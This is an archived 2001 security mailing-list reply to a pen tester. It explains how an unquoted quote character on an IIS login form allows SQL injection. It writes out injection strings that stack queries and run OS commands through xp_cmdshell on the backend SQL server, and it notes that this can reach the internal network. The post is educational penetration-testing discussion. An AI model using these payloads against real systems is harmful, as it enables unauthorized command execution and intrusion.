RE: SQL
From: Javier Fernández-Sanguino (jfernandez@germinus.com)Date: 11/20/01
- Previous message: Kevin Spett: "Re: SQL"
- Maybe in reply to: Gary O'leary-Steele: "SQL"
- Next in thread: root: "Re: SQL"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Subject: RE: SQL Date: Tue, 20 Nov 2001 09:41:39 +0100 Message-ID: <D862800CA540B6488E6D55B3677A0E8E1B6323@mailserver> From: Javier Fernández-Sanguino <jfernandez@germinus.com> To: <garyo@sec-1.com>, <PEN-TEST@securityfocus.com>
You migh (90% chance) have a possibility to
a) alter the database
b) execute remote commands in the SQL server
This is a common error (not quoting quotes :), this is due to the SQL
statement being executed in the ISS server (through an ODBC connection)
is just added the information given by the user.
Thus:
SELECT * from test where value='$user'
if user=' becomes:
SELECT * from test where value='''
which generates your error.
However, you can do the following
if user=test'; select * from test -- becomes:
SELECT * from test where value='test'; select * from test -- '
which is a valid SQL statement (two as a matter of fact) and
if user=test'; exec master..xp_cmdshell 'dir' -- becomes:
SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' --
which will run the 'dir' command in the SQL server (not in the IIS!)
This is fun
since, in some cases, the ISS server is in a DMZ and the SQL server is
in the internal
lan or through another firewall like this:
Internet ----- Fw -------- Fw --------- Local network
| |
IIS SQL server
or
Internet ----- Fw -------- Local network
| |
IIS SQL server
So you might be one step closer to your target !
Some references (fresh out from google):
http://www.sqlsecurity.com/faq-inj.asp
http://www.silksoft.co.za/data/sqlinjectionattack.htm
Regards
Javier Fernández-Sanguino Peña
>
> Hello all,
>
>
> I am doing a pen test against a IIS 5 web server. The web
> server requires a
> user name and password via a logon form. if a single quote
> character is
> entered (username)the following error is produced
>
> [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> before the character string '' and password=''.
>
> I remember reading somewhere that this can be used to gain
> further access?
> but i cant find the info.
>
> Can any one help?
>
> Thanks in advance.
>
> Gary
>
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security
> vulnerabilities please see:
> https://alerts.securityfocus.com/
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Kevin Spett: "Re: SQL"
- Maybe in reply to: Gary O'leary-Steele: "SQL"
- Next in thread: root: "Re: SQL"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
